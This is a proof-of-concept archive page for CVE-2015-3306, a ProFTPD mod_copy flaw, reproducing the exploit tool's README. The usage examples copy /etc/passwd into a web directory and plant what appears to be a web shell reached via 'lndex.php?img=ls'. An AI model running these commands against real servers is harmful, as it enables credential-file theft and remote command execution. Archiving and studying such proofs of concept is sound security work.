Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2015-3306 PoC — ProFTPD mod_copy模块信息泄露漏洞

Source
https://github.com/shk0x/cpx_proftpd
Associated Vulnerability
Title:ProFTPD mod_copy模块信息泄露漏洞 (CVE-2015-3306)
Description:The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
Description
Tool for exploit CVE-2015-3306
Readme
# cpx_proftpd

PoC by Daniel Aldana for [CVE-2015-3306](http://bugs.proftpd.org/show_bug.cgi?id=4169) exploitation. Bug reported by Vadim Melihow.

###METHOD 1:

usage: 

```
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_SRC_FILE> <REMOTE_ABSOLUTEPATH_DST_FILE>
```

ex:

```
python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt
```

then try:

```
http://127.0.0.1/pass.txt
```

###METHOD 2:


usage: 

```
python cpx_proftp.py <IP> <REMOTE_ABSOLUTEPATH_WEBDIR>
```

ex:

```
python cpx_proftp.py 127.0.0.1 /var/www/html
```

then try:

```
http://127.0.0.1/lndex.php?img=ls
```
File Snapshot

 [4.0K]  /data/pocs/fff2904862bd0dfddf7608e594ae5495dcd435c4
├── [1.5K]  cpx_proftp.py
└── [ 589]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →